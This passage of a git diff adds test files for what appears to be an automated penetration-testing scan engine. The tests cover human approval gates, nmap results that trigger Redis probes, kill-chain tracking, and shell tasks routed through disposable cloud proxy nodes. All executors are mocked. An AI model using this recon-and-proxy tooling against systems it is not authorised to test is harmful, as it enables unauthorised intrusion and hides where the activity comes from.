+        assert task.approval_expires_at.year == 2026
diff --git a/packages/cli/tests/test_scanner/test_approval_registry.py b/packages/cli/tests/test_scanner/test_approval_registry.py
new file mode 100644
index 0000000..e0da490
--- /dev/null
+++ b/packages/cli/tests/test_scanner/test_approval_registry.py
@@ -0,0 +1,67 @@
+"""Tests for ApprovalRegistry."""
+import asyncio
+import pytest
+from opentools.scanner.approval import ApprovalRegistry
+
+class TestApprovalRegistry:
+    def test_register_returns_event(self):
+        r = ApprovalRegistry()
+        event = r.register("t1")
+        assert isinstance(event, asyncio.Event)
+        assert not event.is_set()
+
+    def test_signal_sets_event(self):
+        r = ApprovalRegistry()
+        event = r.register("t1")
+        assert r.signal("t1") is True
+        assert event.is_set()
+
+    def test_signal_missing_returns_false(self):
+        r = ApprovalRegistry()
+        assert r.signal("nope") is False
+
+    def test_remove_cleans_up(self):
+        r = ApprovalRegistry()
+        r.register("t1")
+        r.remove("t1")
+        assert r.signal("t1") is False
+
+    def test_remove_missing_no_raise(self):
+        ApprovalRegistry().remove("nope")
+
+    def test_has_ticket(self):
+        r = ApprovalRegistry()
+        assert r.has_ticket("t1") is False
+        r.register("t1")
+        assert r.has_ticket("t1") is True
+
+    def test_pending_ticket_ids(self):
+        r = ApprovalRegistry()
+        r.register("a")
+        r.register("b")
+        assert r.pending_ticket_ids() == {"a", "b"}
+
+    @pytest.mark.asyncio
+    async def test_event_wakes_awaiter(self):
+        r = ApprovalRegistry()
+        event = r.register("t1")
+        woke = False
+        async def waiter():
+            nonlocal woke
+            await asyncio.wait_for(event.wait(), timeout=5.0)
+            woke = True
+        task = asyncio.ensure_future(waiter())
+        await asyncio.sleep(0.05)
+        assert not woke
+        r.signal("t1")
+        await task
+        assert woke
+
+    @pytest.mark.asyncio
+    async def test_multiple_gates_independent(self):
+        r = ApprovalRegistry()
+        ea = r.register("a")
+        eb = r.register("b")
+        r.signal("a")
+        assert ea.is_set()
+        assert not eb.is_set()
diff --git a/packages/cli/tests/test_scanner/test_engine_approval.py b/packages/cli/tests/test_scanner/test_engine_approval.py
new file mode 100644
index 0000000..05a69fa
--- /dev/null
+++ b/packages/cli/tests/test_scanner/test_engine_approval.py
@@ -0,0 +1,272 @@
+"""Tests for ScanEngine approval gate integration."""
+
+import asyncio
+from datetime import datetime, timezone
+from typing import Any, Callable
+
+import pytest
+
+from opentools.scanner.approval import ApprovalRegistry
+from opentools.scanner.cancellation import CancellationToken
+from opentools.scanner.engine import ScanEngine
+from opentools.scanner.executor.base import TaskExecutor, TaskOutput
+from opentools.scanner.models import (
+    ApprovalRequirement,
+    Scan,
+    ScanStatus,
+    ScanTask,
+    TaskStatus,
+    TaskType,
+    TargetType,
+)
+from opentools.shared.progress import EventBus
+from opentools.shared.resource_pool import AdaptiveResourcePool
+
+
+# ---------------------------------------------------------------------------
+# Helpers
+# ---------------------------------------------------------------------------
+
+
+class FakeStore:
+    """In-memory store implementing update_task_status / get_task_status."""
+
+    def __init__(self) -> None:
+        self._task_statuses: dict[str, dict[str, Any]] = {}
+
+    async def update_task_status(
+        self, task_id: str, status: str, **fields: Any
+    ) -> None:
+        self._task_statuses[task_id] = {"status": status, **fields}
+
+    async def get_task_status(self, task_id: str) -> dict[str, Any] | None:
+        return self._task_statuses.get(task_id)
+
+
+class MockExecutor:
+    def __init__(self, results: dict[str, TaskOutput] | None = None):
+        self._results = results or {}
+        self._default = TaskOutput(exit_code=0, stdout="ok", duration_ms=10)
+        self.executed: list[str] = []
+
+    async def execute(
+        self,
+        task: ScanTask,
+        on_output: Callable[[bytes], None],
+        cancellation: CancellationToken,
+    ) -> TaskOutput:
+        self.executed.append(task.id)
+        on_output(b"mock output")
+        return self._results.get(task.id, self._default)
+
+
+def _make_scan(scan_id: str = "scan1") -> Scan:
+    return Scan(
+        id=scan_id,
+        engagement_id="eng1",
+        target="/tmp/test",
+        target_type=TargetType.SOURCE_CODE,
+        status=ScanStatus.PENDING,
+        created_at=datetime.now(timezone.utc),
+    )
+
+
+def _make_task(
+    task_id: str,
+    scan_id: str = "scan1",
+    depends_on: list[str] | None = None,
+    priority: int = 50,
+    requires_approval: ApprovalRequirement | None = None,
+) -> ScanTask:
+    return ScanTask(
+        id=task_id,
+        scan_id=scan_id,
+        name=f"task-{task_id}",
+        tool="test-tool",
+        task_type=TaskType.SHELL,
+        command="echo test",
+        depends_on=depends_on or [],
+        priority=priority,
+        requires_approval=requires_approval,
+    )
+
+
+def _make_gated_engine(
+    tasks: list[ScanTask],
+    executor: MockExecutor | None = None,
+    store: FakeStore | None = None,
+    registry: ApprovalRegistry | None = None,
+) -> tuple[ScanEngine, MockExecutor, FakeStore, ApprovalRegistry]:
+    """Create a ScanEngine wired with approval gate support."""
+    pool = AdaptiveResourcePool(
+        global_limit=4, group_limits={"approval_gate": 9999}
+    )
+    mock_exec = executor or MockExecutor()
+    fake_store = store or FakeStore()
+    approval_reg = registry or ApprovalRegistry()
+
+    executors = {
+        TaskType.SHELL: mock_exec,
+        TaskType.DOCKER_EXEC: mock_exec,
+        TaskType.MCP_CALL: mock_exec,
+    }
+    engine = ScanEngine(
+        scan=_make_scan(),
+        resource_pool=pool,
+        executors=executors,
+        event_bus=EventBus(),
+        cancellation=CancellationToken(),
+    )
+    engine.set_approval_registry(approval_reg)
+    engine.set_approval_store(fake_store)
+    engine.load_tasks(tasks)
+
+    return engine, mock_exec, fake_store, approval_reg
+
+
+# ---------------------------------------------------------------------------
+# Tests
+# ---------------------------------------------------------------------------
+
+
+class TestEngineApprovalGate:
+    @pytest.mark.asyncio
+    async def test_approved_task_executes(self):
+        """Gated task with 5s timeout: approve it concurrently, verify executor ran."""
+        task = _make_task(
+            "gated",
+            requires_approval=ApprovalRequirement(timeout_seconds=5),
+        )
+        engine, mock_exec, store, registry = _make_gated_engine(tasks=[task])
+
+        async def approve_soon():
+            # Wait until the registry has a pending ticket
+            for _ in range(200):
+                tickets = registry.pending_ticket_ids()
+                if tickets:
+                    break
+                await asyncio.sleep(0.01)
+            else:
+                raise AssertionError("No pending ticket appeared")
+
+            ticket_id = next(iter(tickets))
+            # Write "approved" to store, then signal the event
+            await store.update_task_status("gated", "approved")
+            registry.signal(ticket_id)
+
+        asyncio.ensure_future(approve_soon())
+        await asyncio.wait_for(engine.run(), timeout=10)
+
+        assert "gated" in mock_exec.executed
+        assert engine._tasks["gated"].status == TaskStatus.COMPLETED
+
+    @pytest.mark.asyncio
+    async def test_rejected_task_fails(self):
+        """Gated task: write 'rejected' to store. Executor must NOT run."""
+        task = _make_task(
+            "gated",
+            requires_approval=ApprovalRequirement(timeout_seconds=5),
+        )
+        engine, mock_exec, store, registry = _make_gated_engine(tasks=[task])
+
+        async def reject_soon():
+            for _ in range(200):
+                tickets = registry.pending_ticket_ids()
+                if tickets:
+                    break
+                await asyncio.sleep(0.01)
+            else:
+                raise AssertionError("No pending ticket appeared")
+
+            ticket_id = next(iter(tickets))
+            await store.update_task_status("gated", "rejected")
+            registry.signal(ticket_id)
+
+        asyncio.ensure_future(reject_soon())
+        await asyncio.wait_for(engine.run(), timeout=10)
+
+        assert "gated" not in mock_exec.executed
+        assert engine._tasks["gated"].status == TaskStatus.FAILED
+
+    @pytest.mark.asyncio
+    async def test_timeout_rejects_automatically(self):
+        """Gated task with 1s timeout. Don't approve. Verify auto-expiry."""
+        task = _make_task(
+            "gated",
+            requires_approval=ApprovalRequirement(timeout_seconds=1),
+        )
+        engine, mock_exec, store, registry = _make_gated_engine(tasks=[task])
+
+        await asyncio.wait_for(engine.run(), timeout=10)
+
+        assert "gated" not in mock_exec.executed
+        assert engine._tasks["gated"].status == TaskStatus.FAILED
+        stored = await store.get_task_status("gated")
+        assert stored is not None
+        assert stored["status"] == "approval_expired"
+
+    @pytest.mark.asyncio
+    async def test_non_gated_task_unaffected(self):
+        """Normal task without requires_approval executes normally."""
+        task = _make_task("normal")
+        engine, mock_exec, store, registry = _make_gated_engine(tasks=[task])
+
+        await asyncio.wait_for(engine.run(), timeout=10)
+
+        assert "normal" in mock_exec.executed
+        assert engine._tasks["normal"].status == TaskStatus.COMPLETED
+
+    @pytest.mark.asyncio
+    async def test_parallel_branches_continue_during_gate(self):
+        """Two tasks: one gated (1s timeout), one normal. Both ready simultaneously.
+
+        Normal task completes while gated task times out."""
+        gated = _make_task(
+            "gated",
+            requires_approval=ApprovalRequirement(timeout_seconds=1),
+        )
+        normal = _make_task("normal")
+
+        engine, mock_exec, store, registry = _make_gated_engine(
+            tasks=[gated, normal]
+        )
+
+        await asyncio.wait_for(engine.run(), timeout=10)
+
+        # Normal task executed
+        assert "normal" in mock_exec.executed
+        assert engine._tasks["normal"].status == TaskStatus.COMPLETED
+
+        # Gated task timed out, never executed
+        assert "gated" not in mock_exec.executed
+        assert engine._tasks["gated"].status == TaskStatus.FAILED
+
+    @pytest.mark.asyncio
+    async def test_no_gate_without_registry(self):
+        """Engine without approval registry configured. Gated task executes immediately."""
+        task = _make_task(
+            "gated",
+            requires_approval=ApprovalRequirement(timeout_seconds=5),
+        )
+        # Build engine WITHOUT approval registry
+        pool = AdaptiveResourcePool(global_limit=4)
+        mock_exec = MockExecutor()
+        executors = {
+            TaskType.SHELL: mock_exec,
+            TaskType.DOCKER_EXEC: mock_exec,
+            TaskType.MCP_CALL: mock_exec,
+        }
+        engine = ScanEngine(
+            scan=_make_scan(),
+            resource_pool=pool,
+            executors=executors,
+            event_bus=EventBus(),
+            cancellation=CancellationToken(),
+        )
+        engine.load_tasks([task])
+
+        await asyncio.wait_for(engine.run(), timeout=10)
+
+        # Task should have executed immediately — no gate phase
+        assert "gated" in mock_exec.executed
+        assert engine._tasks["gated"].status == TaskStatus.COMPLETED
diff --git a/packages/cli/tests/test_scanner/test_engine_mutation.py b/packages/cli/tests/test_scanner/test_engine_mutation.py
new file mode 100644
index 0000000..d4d1af4
--- /dev/null
+++ b/packages/cli/tests/test_scanner/test_engine_mutation.py
@@ -0,0 +1,377 @@
+"""Tests for ScanEngine mutation layer integration."""
+
+import asyncio
+from datetime import datetime, timezone
+from typing import Callable
+
+import pytest
+
+from opentools.scanner.cancellation import CancellationToken
+from opentools.scanner.engine import ScanEngine
+from opentools.scanner.executor.base import TaskExecutor, TaskOutput
+from opentools.scanner.models import (
+    ReactiveEdge,
+    Scan,
+    ScanConfig,
+    ScanStatus,
+    ScanTask,
+    TaskStatus,
+    TaskType,
+    TargetType,
+)
+from opentools.scanner.mutation.analyzer import AnalyzerRegistry
+from opentools.scanner.mutation.strategy import RedisProbeStrategy
+from opentools.shared.progress import EventBus
+from opentools.shared.resource_pool import AdaptiveResourcePool
+
+
+# ---------------------------------------------------------------------------
+# Helpers
+# ---------------------------------------------------------------------------
+
+
+class MockExecutor:
+    def __init__(self, results: dict[str, TaskOutput] | None = None):
+        self._results = results or {}
+        self._default = TaskOutput(exit_code=0, stdout="ok", duration_ms=10)
+        self.executed: list[str] = []
+
+    async def execute(
+        self,
+        task: ScanTask,
+        on_output: Callable[[bytes], None],
+        cancellation: CancellationToken,
+    ) -> TaskOutput:
+        self.executed.append(task.id)
+        on_output(b"mock output")
+        return self._results.get(task.id, self._default)
+
+
+def _make_scan(scan_id: str = "scan1") -> Scan:
+    return Scan(
+        id=scan_id,
+        engagement_id="eng1",
+        target="10.0.0.0/24",
+        target_type=TargetType.NETWORK,
+        status=ScanStatus.PENDING,
+        created_at=datetime.now(timezone.utc),
+    )
+
+
+def _make_engine_with_mutation(
+    tasks: list[ScanTask],
+    executor: MockExecutor | None = None,
+    max_mutation_spawns: int = 100,
+) -> tuple[ScanEngine, MockExecutor]:
+    """Create a ScanEngine wired with the mutation layer (analyzer + strategies)."""
+    pool = AdaptiveResourcePool(global_limit=4)
+    mock_exec = executor or MockExecutor()
+    executors = {
+        TaskType.SHELL: mock_exec,
+        TaskType.DOCKER_EXEC: mock_exec,
+        TaskType.MCP_CALL: mock_exec,
+    }
+    event_bus = EventBus()
+    cancel = CancellationToken()
+    scan = _make_scan()
+
+    engine = ScanEngine(
+        scan=scan,
+        resource_pool=pool,
+        executors=executors,
+        event_bus=event_bus,
+        cancellation=cancel,
+    )
+
+    # Wire up mutation layer
+    registry = AnalyzerRegistry()
+    registry.register_builtins()
+    engine.set_analyzer_registry(registry)
+    engine.set_mutation_strategies([RedisProbeStrategy()])
+    engine.set_max_mutation_spawns(max_mutation_spawns)
+
+    engine.load_tasks(tasks)
+    return engine, mock_exec
+
+
+# ---------------------------------------------------------------------------
+# Nmap XML fixtures
+# ---------------------------------------------------------------------------
+
+NMAP_REDIS_XML = '''<?xml version="1.0"?>
+<nmaprun>
+  <host>
+    <address addr="10.0.0.1" addrtype="ipv4"/>
+    <ports>
+      <port protocol="tcp" portid="6379">
+        <state state="open"/>
+        <service name="redis" product="Redis" version="6.2.7"/>
+      </port>
+    </ports>
+  </host>
+</nmaprun>'''
+
+NMAP_HTTP_ONLY_XML = '''<?xml version="1.0"?>
+<nmaprun>
+  <host>
+    <address addr="10.0.0.1" addrtype="ipv4"/>
+    <ports>
+      <port protocol="tcp" portid="80">
+        <state state="open"/>
+        <service name="http"/>
+      </port>
+    </ports>
+  </host>
+</nmaprun>'''
+
+
+# ---------------------------------------------------------------------------
+# Tests
+# ---------------------------------------------------------------------------
+
+
+class TestEngineMutationIntegration:
+    @pytest.mark.asyncio
+    async def test_nmap_redis_spawns_probe(self):
+        """Nmap finds Redis -> engine spawns redis-cli probe -> probe runs."""
+        nmap_task = ScanTask(
+            id="nmap-scan",
+            scan_id="scan1",
+            name="Nmap network scan",
+            tool="nmap",
+            task_type=TaskType.SHELL,
+            command="nmap -sV -oX - 10.0.0.1",
+            depends_on=[],
+            priority=10,
+        )
+
+        mock_exec = MockExecutor(
+            results={
+                "nmap-scan": TaskOutput(
+                    exit_code=0, stdout=NMAP_REDIS_XML, duration_ms=100
+                ),
+            }
+        )
+
+        engine, _ = _make_engine_with_mutation(
+            tasks=[nmap_task], executor=mock_exec
+        )
+
+        await engine.run()
+
+        # The redis probe task should have been spawned and executed
+        assert "nmap-scan" in mock_exec.executed
+        assert "redis-probe-10.0.0.1-6379" in mock_exec.executed
+
+        # Verify spawned task properties
+        probe_task = engine._tasks["redis-probe-10.0.0.1-6379"]
+        assert probe_task.tool == "redis-cli"
+        assert probe_task.spawned_by == "nmap-scan"
+        assert probe_task.status == TaskStatus.COMPLETED
+
+    @pytest.mark.asyncio
+    async def test_no_mutation_when_no_interesting_services(self):
+        """Nmap finds only HTTP -> no mutations -> only nmap-scan executed."""
+        nmap_task = ScanTask(
+            id="nmap-scan",
+            scan_id="scan1",
+            name="Nmap network scan",
+            tool="nmap",
+            task_type=TaskType.SHELL,
+            command="nmap -sV -oX - 10.0.0.1",
+            depends_on=[],
+            priority=10,
+        )
+
+        mock_exec = MockExecutor(
+            results={
+                "nmap-scan": TaskOutput(
+                    exit_code=0, stdout=NMAP_HTTP_ONLY_XML, duration_ms=100
+                ),
+            }
+        )
+
+        engine, _ = _make_engine_with_mutation(
+            tasks=[nmap_task], executor=mock_exec
+        )
+
+        await engine.run()
+
+        assert mock_exec.executed == ["nmap-scan"]
+
+    @pytest.mark.asyncio
+    async def test_mutation_respects_global_budget(self):
+        """Set max_mutation_spawns=0 -> no mutations allowed."""
+        nmap_task = ScanTask(
+            id="nmap-scan",
+            scan_id="scan1",
+            name="Nmap network scan",
+            tool="nmap",
+            task_type=TaskType.SHELL,
+            command="nmap -sV -oX - 10.0.0.1",
+            depends_on=[],
+            priority=10,
+        )
+
+        mock_exec = MockExecutor(
+            results={
+                "nmap-scan": TaskOutput(
+                    exit_code=0, stdout=NMAP_REDIS_XML, duration_ms=100
+                ),
+            }
+        )
+
+        engine, _ = _make_engine_with_mutation(
+            tasks=[nmap_task], executor=mock_exec, max_mutation_spawns=0
+        )
+
+        await engine.run()
+
+        # Only nmap-scan should have run — budget of 0 blocks all mutations
+        assert mock_exec.executed == ["nmap-scan"]
+        assert "redis-probe-10.0.0.1-6379" not in engine._tasks
+
+    @pytest.mark.asyncio
+    async def test_mutation_coexists_with_reactive_edges(self):
+        """Both mutation AND reactive edge fire on same task."""
+        edge_spawned = ScanTask(
+            id="edge-spawned",
+            scan_id="scan1",
+            name="Edge-spawned task",
+            tool="test-tool",
+            task_type=TaskType.SHELL,
+            command="echo edge",
+            depends_on=[],
+            priority=50,
+        )
+
+        edge = ReactiveEdge(
+            id="edge1",
+            trigger_task_id="nmap-scan",
+            evaluator="builtin:always_spawn",
+            spawns=[edge_spawned],
+        )
+
+        nmap_task = ScanTask(
+            id="nmap-scan",
+            scan_id="scan1",
+            name="Nmap network scan",
+            tool="nmap",
+            task_type=TaskType.SHELL,
+            command="nmap -sV -oX - 10.0.0.1",
+            depends_on=[],
+            priority=10,
+            reactive_edges=[edge],
+        )
+
+        mock_exec = MockExecutor(
+            results={
+                "nmap-scan": TaskOutput(
+                    exit_code=0, stdout=NMAP_REDIS_XML, duration_ms=100
+                ),
+            }
+        )
+
+        engine, _ = _make_engine_with_mutation(
+            tasks=[nmap_task], executor=mock_exec
+        )
+
+        def always_spawn(task, output, edge):
+            return edge.spawns or []
+
+        engine.register_edge_evaluator("builtin:always_spawn", always_spawn)
+
+        await engine.run()
+
+        # Both mutation-spawned and edge-spawned tasks should have executed
+        assert "nmap-scan" in mock_exec.executed
+        assert "redis-probe-10.0.0.1-6379" in mock_exec.executed
+        assert "edge-spawned" in mock_exec.executed
+
+    @pytest.mark.asyncio
+    async def test_kill_chain_state_accessible(self):
+        """After run, engine.kill_chain_state reflects discovered services."""
+        nmap_task = ScanTask(
+            id="nmap-scan",
+            scan_id="scan1",
+            name="Nmap network scan",
+            tool="nmap",
+            task_type=TaskType.SHELL,
+            command="nmap -sV -oX - 10.0.0.1",
+            depends_on=[],
+            priority=10,
+        )
+
+        mock_exec = MockExecutor(
+            results={
+                "nmap-scan": TaskOutput(
+                    exit_code=0, stdout=NMAP_REDIS_XML, duration_ms=100
+                ),
+            }
+        )
+
+        engine, _ = _make_engine_with_mutation(
+            tasks=[nmap_task], executor=mock_exec
+        )
+
+        await engine.run()
+
+        assert engine.kill_chain_state.has_service("redis") is True
+        assert engine.kill_chain_state.total_spawned == 1
+
+    @pytest.mark.asyncio
+    async def test_no_mutation_without_registry(self):
+        """Engine without mutation layer configured -> no mutations."""
+        nmap_task = ScanTask(
+            id="nmap-scan",
+            scan_id="scan1",
+            name="Nmap network scan",
+            tool="nmap",
+            task_type=TaskType.SHELL,
+            command="nmap -sV -oX - 10.0.0.1",
+            depends_on=[],
+            priority=10,
+        )
+
+        gated_task = ScanTask(
+            id="gated",
+            scan_id="scan1",
+            name="Gated task",
+            tool="test-tool",
+            task_type=TaskType.SHELL,
+            command="echo gated",
+            depends_on=["nmap-scan"],
+            priority=50,
+        )
+
+        mock_exec = MockExecutor(
+            results={
+                "nmap-scan": TaskOutput(
+                    exit_code=0, stdout=NMAP_REDIS_XML, duration_ms=100
+                ),
+            }
+        )
+
+        # Build engine WITHOUT mutation layer
+        pool = AdaptiveResourcePool(global_limit=4)
+        executors = {
+            TaskType.SHELL: mock_exec,
+            TaskType.DOCKER_EXEC: mock_exec,
+            TaskType.MCP_CALL: mock_exec,
+        }
+        engine = ScanEngine(
+            scan=_make_scan(),
+            resource_pool=pool,
+            executors=executors,
+            event_bus=EventBus(),
+            cancellation=CancellationToken(),
+        )
+        engine.load_tasks([nmap_task, gated_task])
+
+        await engine.run()
+
+        # Both static tasks execute, no mutations
+        assert "nmap-scan" in mock_exec.executed
+        assert "gated" in mock_exec.executed
+        assert "redis-probe-10.0.0.1-6379" not in mock_exec.executed
+        assert "redis-probe-10.0.0.1-6379" not in engine._tasks
diff --git a/packages/cli/tests/test_scanner/test_executor_proxied_shell.py b/packages/cli/tests/test_scanner/test_executor_proxied_shell.py
new file mode 100644
index 0000000..852ee27
--- /dev/null
+++ b/packages/cli/tests/test_scanner/test_executor_proxied_shell.py
@@ -0,0 +1,140 @@
+"""Tests for ProxiedShellExecutor."""
+from __future__ import annotations
+
+import pytest
+
+from opentools.scanner.cancellation import CancellationToken
+from opentools.scanner.executor.proxied_shell import ProxiedShellExecutor
+from opentools.scanner.infra.provider import CloudNodeProvider, ProvisioningError
+from opentools.scanner.models import ScanTask, TaskIsolation, TaskType
+
+
+# ---------------------------------------------------------------------------
+# FakeProvider — identical to the one in test_infra_proxy.py
+# ---------------------------------------------------------------------------
+
+
+class FakeProvider(CloudNodeProvider):
+    def __init__(
+        self,
+        ready_after_polls: int = 1,
+        ip_address: str = "1.2.3.4",
+        fail_create: bool = False,
+        fail_destroy: bool = False,
+    ) -> None:
+        self.ready_after_polls = ready_after_polls
+        self.ip_address = ip_address
+        self.fail_create = fail_create
+        self.fail_destroy = fail_destroy
+        self.created_ids: list[str] = []
+        self.destroyed_ids: list[str] = []
+        self._poll_count = 0
+
+    async def create_node(self, region: str, ssh_public_key: str, tags: list[str]) -> str:
+        if self.fail_create:
+            raise ProvisioningError("create failed")
+        node_id = f"fake-{len(self.created_ids)}"
+        self.created_ids.append(node_id)
+        return node_id
+
+    async def poll_status(self, provider_id: str) -> tuple[str, str | None]:
+        self._poll_count += 1
+        if self._poll_count >= self.ready_after_polls:
+            return "active", self.ip_address
+        return "creating", None
+
+    async def destroy_node(self, provider_id: str) -> None:
+        if self.fail_destroy:
+            raise ProvisioningError("destroy failed")
+        self.destroyed_ids.append(provider_id)
+
+
+# ---------------------------------------------------------------------------
+# Helpers
+# ---------------------------------------------------------------------------
+
+
+def _make_task(
+    command: str | None = "echo hello",
+    isolation: TaskIsolation = TaskIsolation.NONE,
+    task_id: str = "t1",
+) -> ScanTask:
+    return ScanTask(
+        id=task_id,
+        scan_id="scan1",
+        name="test-task",
+        tool="test",
+        task_type=TaskType.SHELL,
+        command=command,
+        isolation=isolation,
+    )
+
+
+# ---------------------------------------------------------------------------
+# Tests
+# ---------------------------------------------------------------------------
+
+
+class TestProxiedShellExecutor:
+    @pytest.mark.asyncio
+    async def test_non_proxied_task_runs_directly(self) -> None:
+        """TaskIsolation.NONE runs directly without touching the provider."""
+        provider = FakeProvider()
+        executor = ProxiedShellExecutor(provider=provider, _skip_tunnel=True)
+        task = _make_task(command="echo direct", isolation=TaskIsolation.NONE)
+        cancel = CancellationToken()
+
+        result = await executor.execute(task, lambda _: None, cancel)
+
+        assert result.exit_code == 0
+        assert "direct" in result.stdout
+        # Provider was never called
+        assert provider.created_ids == []
+        assert provider.destroyed_ids == []
+
+    @pytest.mark.asyncio
+    async def test_no_provider_falls_through(self) -> None:
+        """NETWORK_ISOLATED task with provider=None falls through to direct run."""
+        executor = ProxiedShellExecutor(provider=None, _skip_tunnel=True)
+        task = _make_task(command="echo fallthrough", isolation=TaskIsolation.NETWORK_ISOLATED)
+        cancel = CancellationToken()
+
+        result = await executor.execute(task, lambda _: None, cancel)
+
+        assert result.exit_code == 0
+        assert "fallthrough" in result.stdout
+
+    @pytest.mark.asyncio
+    async def test_proxied_task_provisions_and_destroys(self) -> None:
+        """NETWORK_ISOLATED with a real provider provisions one node and destroys it."""
+        provider = FakeProvider(ready_after_polls=1)
+        executor = ProxiedShellExecutor(provider=provider, _skip_tunnel=True)
+        task = _make_task(command="echo proxied", isolation=TaskIsolation.NETWORK_ISOLATED)
+        cancel = CancellationToken()
+
+        result = await executor.execute(task, lambda _: None, cancel)
+
+        assert result.exit_code == 0
+        # Node was provisioned and torn down
+        assert len(provider.created_ids) == 1
+        assert provider.created_ids == provider.destroyed_ids
+
+    @pytest.mark.asyncio
+    async def test_missing_command_raises(self) -> None:
+        """ValueError is raised when task.command is None."""
+        executor = ProxiedShellExecutor(provider=None)
+        task = _make_task(command=None)
+        cancel = CancellationToken()
+
+        with pytest.raises(ValueError, match="command"):
+            await executor.execute(task, lambda _: None, cancel)
+
+    def test_socks_port_increments(self) -> None:
+        """Each call to _next_socks_port increments from base_socks_port."""
+        executor = ProxiedShellExecutor(provider=None, base_socks_port=10800)
+
+        port1 = executor._next_socks_port()
+        port2 = executor._next_socks_port()
+
+        assert port1 == 10800
+        assert port2 == 10801
diff --git a/packages/cli/tests/test_scanner/test_infra_provider.py b/packages/cli/tests/test_scanner/test_infra_provider.py
new file mode 100644
index 0000000..118fcc4
--- /dev/null
+++ b/packages/cli/tests/test_scanner/test_infra_provider.py
@@ -0,0 +1,575 @@
+"""Tests for CloudNodeProvider ABC, DigitalOceanProvider, and VultrProvider.
+
+Uses httpx.MockTransport to avoid real network calls.
+"""
+from __future__ import annotations
+import json
+
+import httpx
+import pytest
+
+from opentools.scanner.infra.provider import (
+    CloudNodeProvider,
+    EphemeralNode,
+    ProvisioningError,
+    ProvisioningTimeout,
+)
+from opentools.scanner.infra.digitalocean import DigitalOceanProvider
+from opentools.scanner.infra.vultr import VultrProvider
+
+
+# ---------------------------------------------------------------------------
+# Helpers
+# ---------------------------------------------------------------------------
+
+def _make_transport(responses: list[httpx.Response]) -> httpx.MockTransport:
+    """Return a MockTransport that replays responses in order."""
+    idx = 0
+
+    def handler(request: httpx.Request) -> httpx.Response:
+        nonlocal idx
+        resp = responses[idx]
+        idx += 1
+        return resp
+
+    return httpx.MockTransport(handler)
+
+
+def _json_response(data: dict, status_code: int = 200) -> httpx.Response:
+    return httpx.Response(
+        status_code=status_code,
+        headers={"Content-Type": "application/json"},
+        content=json.dumps(data).encode(),
+    )
+
+
+def _empty_response(status_code: int) -> httpx.Response:
+    return httpx.Response(status_code=status_code)
+
+
+# ---------------------------------------------------------------------------
+# EphemeralNode
+# ---------------------------------------------------------------------------
+
+class TestEphemeralNode:
+    def test_construction_minimal(self):
+        node = EphemeralNode(
+            provider_id="123",
+            ip_address="1.2.3.4",
+            region="nyc3",
+            ssh_key_fingerprint="aa:bb:cc",
+        )
+        assert node.provider_id == "123"
+        assert node.ip_address == "1.2.3.4"
+        assert node.tags == []
+        assert node.metadata == {}
+
+    def test_construction_full(self):
+        node = EphemeralNode(
+            provider_id="456",
+            ip_address="5.6.7.8",
+            region="lon1",
+            ssh_key_fingerprint="dd:ee:ff",
+            tags=["scan", "ot-proxy"],
+            metadata={"scan_id": "s1"},
+        )
+        assert node.tags == ["scan", "ot-proxy"]
+        assert node.metadata == {"scan_id": "s1"}
+
+
+# ---------------------------------------------------------------------------
+# CloudNodeProvider ABC
+# ---------------------------------------------------------------------------
+
+class TestCloudNodeProviderABC:
+    def test_is_abstract(self):
+        """Cannot instantiate CloudNodeProvider directly."""
+        with pytest.raises(TypeError):
+            CloudNodeProvider()  # type: ignore[abstract]
+
+    def test_digitalocean_is_subclass(self):
+        assert issubclass(DigitalOceanProvider, CloudNodeProvider)
+
+    def test_vultr_is_subclass(self):
+        assert issubclass(VultrProvider, CloudNodeProvider)
+
+
+# ---------------------------------------------------------------------------
+# DigitalOceanProvider
+# ---------------------------------------------------------------------------
+
+def _make_do_provider(responses: list[httpx.Response]) -> DigitalOceanProvider:
+    transport = _make_transport(responses)
+    client = httpx.AsyncClient(
+        base_url="https://api.digitalocean.com/v2",
+        transport=transport,
+    )
+    return DigitalOceanProvider(client=client)
+
+
+class TestDigitalOceanProviderCreateNode:
+    @pytest.mark.asyncio
+    async def test_create_node_returns_id(self):
+        payload = {"droplet": {"id": 99999, "status": "new"}}
+        provider = _make_do_provider([_json_response(payload, 202)])
+        node_id = await provider.create_node(
+            region="nyc3",
+            ssh_public_key="sha1:abc123",
+            tags=["ot-proxy"],
+        )
+        assert node_id == "99999"
+
+    @pytest.mark.asyncio
+    async def test_create_node_payload_fields(self):
+        """Verify region, size, image, ssh_keys, and tags are sent."""
+        captured: list[httpx.Request] = []
+
+        def handler(req: httpx.Request) -> httpx.Response:
+            captured.append(req)
+            return _json_response({"droplet": {"id": 1}}, 202)
+
+        transport = httpx.MockTransport(handler)
+        client = httpx.AsyncClient(
+            base_url="https://api.digitalocean.com/v2",
+            transport=transport,
+        )
+        provider = DigitalOceanProvider(client=client)
+        await provider.create_node(
+            region="ams3",
+            ssh_public_key="my-key-fingerprint",
+            tags=["tag-a", "tag-b"],
+        )
+
+        assert len(captured) == 1
+        body = json.loads(captured[0].content)
+        assert body["region"] == "ams3"
+        assert body["size"] == "s-1vcpu-512mb-10gb"
+        assert body["image"] == "ubuntu-24-04-x64"
+        assert body["ssh_keys"] == ["my-key-fingerprint"]
+        assert body["tags"] == ["tag-a", "tag-b"]
+        assert body["name"].startswith("ot-proxy-")
+
+    @pytest.mark.asyncio
+    async def test_create_node_name_is_unique(self):
+        """Two calls should produce different node names."""
+        names: list[str] = []
+
+        def handler(req: httpx.Request) -> httpx.Response:
+            body = json.loads(req.content)
+            names.append(body["name"])
+            return _json_response({"droplet": {"id": len(names)}}, 202)
+
+        transport = httpx.MockTransport(handler)
+        client = httpx.AsyncClient(
+            base_url="https://api.digitalocean.com/v2",
+            transport=transport,
+        )
+        provider = DigitalOceanProvider(client=client)
+        await provider.create_node("nyc3", "key", [])
+        await provider.create_node("nyc3", "key", [])
+        assert names[0] != names[1]
+
+
+class TestDigitalOceanProviderPollStatus:
+    @pytest.mark.asyncio
+    async def test_poll_status_active_with_ip(self):
+        payload = {
+            "droplet": {
+                "status": "active",
+                "networks": {"v4": [{"type": "public", "ip_address": "10.0.0.1"}]},
+            }
+        }
+        provider = _make_do_provider([_json_response(payload)])
+        status, ip = await provider.poll_status("99999")
+        assert status == "active"
+        assert ip == "10.0.0.1"
+
+    @pytest.mark.asyncio
+    async def test_poll_status_creating_no_ip(self):
+        payload = {"droplet": {"status": "new", "networks": {}}}
+        provider = _make_do_provider([_json_response(payload)])
+        status, ip = await provider.poll_status("99999")
+        assert status == "creating"
+        assert ip is None
+
+    @pytest.mark.asyncio
+    async def test_poll_status_active_no_public_ip(self):
